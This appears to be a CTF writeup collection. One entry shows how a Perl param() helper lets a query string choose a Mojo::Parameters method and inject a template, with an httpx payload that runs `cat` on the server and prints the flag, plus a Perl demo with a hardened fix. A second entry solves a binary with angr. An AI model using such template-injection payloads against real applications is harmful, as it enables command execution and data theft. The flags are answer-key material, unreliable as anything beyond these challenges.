ctf-writeups

CTF scripts and writeups (mostly challenge + .py solving script)


Challenge: camels

The variant parameter is extracted from the URL using param($c->req->url->query, "variant"):

sub param {
    my $__ = (split(/::/,(caller(0))[3]))[-1];      # name of this sub: "param"
    my $___ = $_[0]->$__($__) || $__;               # $q->param("param"), falling back to "param"
    my @____ = $_[0]->$___($_[1]);                  # $q->$___("variant"): the method name comes from the request
    return ref($____[0]) ? @{$____[0]} : $____[0];  # a reference is dereferenced into a list
}

$q is a Mojo::Parameters object, whose clone method lets us populate the hash of arguments passed to $c->render(...), i.e. we can add the argument inline => 'SSTI: <%= 1 + 1 %>.' and perform a server-side template injection (SSTI).

To avoid bash/curl formatting issues, I used the python library httpx (like requests) to create this payload:

import httpx

r = httpx.get("http://167.235.153.119:8403/", params={
    "param": "clone",
    "inline": "<%= `cat /camels/flag.txt` %>"
})
print(r.text)
# 'BHCTF{you_and_the_camels_are_one}\n'
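As an added example (not the challenge's source), this stand-alone script reproduces the dispatch in the param() helper shown above and puts a hardened version next to it; Fake::Params is a made-up stand-in for Mojo::Parameters whose clone returns a reference, which is what makes the key/value pairs spill into the caller's argument list.

```perl
#!/usr/bin/perl
# Added example, not the challenge's own code. Fake::Params is a constructed
# stand-in for Mojo::Parameters: param() returns a plain value, clone() returns
# a reference, like the real clone does.
use strict;
use warnings;

package Fake::Params;
sub new   { my ($class, %h) = @_; return bless { %h }, $class }
sub param { my ($self, $name) = @_; return $self->{$name} }
sub clone { my ($self) = @_; return [ %$self ] }   # returns an array ref

package main;

# Vulnerable: the method to call is taken from the query parameter "param".
sub param {
    my $__ = (split(/::/, (caller(0))[3]))[-1];   # "param" (this sub's name)
    my $___ = $_[0]->$__($__) || $__;              # $q->param("param") || "param"
    my @____ = $_[0]->$___($_[1]);                 # $q->$___("variant"): request picks $___
    return ref($____[0]) ? @{$____[0]} : $____[0]; # a reference becomes a list
}

# Hardened: always call the fixed accessor and only ever return one scalar,
# so nothing from the request can select a method or widen the return list.
sub param_fixed {
    my ($q, $name) = @_;
    my $v = $q->param($name);
    return defined $v && !ref $v ? $v : undef;
}

my $benign = Fake::Params->new(variant => 'blue');
my @ok = param($benign, 'variant');
print "benign: @ok\n";                                     # benign: blue

# Constructed request where "param" names another method of the object.
my $crafted = Fake::Params->new(param => 'clone', variant => 'blue',
                                inline => 'attacker-controlled text');
my @spill = param($crafted, 'variant');
print "vulnerable returned ", scalar(@spill), " values\n"; # 6: three key/value pairs
my @safe = (param_fixed($crafted, 'variant'));
print "hardened returned: @safe\n";                        # hardened returned: blue
```

The list returned by the vulnerable helper is what ends up as extra named arguments to $c->render(...) in the challenge; the hardened helper can only ever contribute the one value that was asked for.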

Challenge: Understanding is forthcoming (part 1)

Really cool binary! Luckily Angr somehow knows what is going on:

import angr

proj = angr.Project("./forthcoming", auto_load_libs=False)
state = proj.factory.entry_state()
simgr = proj.factory.simulation_manager(state)

# posix.dumps(1) returns bytes, so the needle has to be a bytes literal
simgr.explore(find=lambda s: b"you got it" in s.posix.dumps(1))
# 1 path found! <SimulationManager with 2 active, 34 deadended, 1 found>

print(simgr.found[0].posix.dumps(0))  # dumps(0) is stdin
# b'BHCTF{d1d_y0u_3nj0Y_mY_l1ttl3_Rn9}\n'